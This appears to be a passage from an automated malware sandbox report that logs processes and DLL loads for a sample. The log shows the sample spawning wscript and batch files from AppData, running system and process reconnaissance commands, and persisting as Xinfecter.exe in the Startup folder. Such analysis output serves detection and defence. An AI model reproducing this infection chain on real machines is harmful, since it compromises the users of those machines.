      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsusererclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: netapi32.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: wininet.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: samcli.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: dsrole.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: cryptsp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
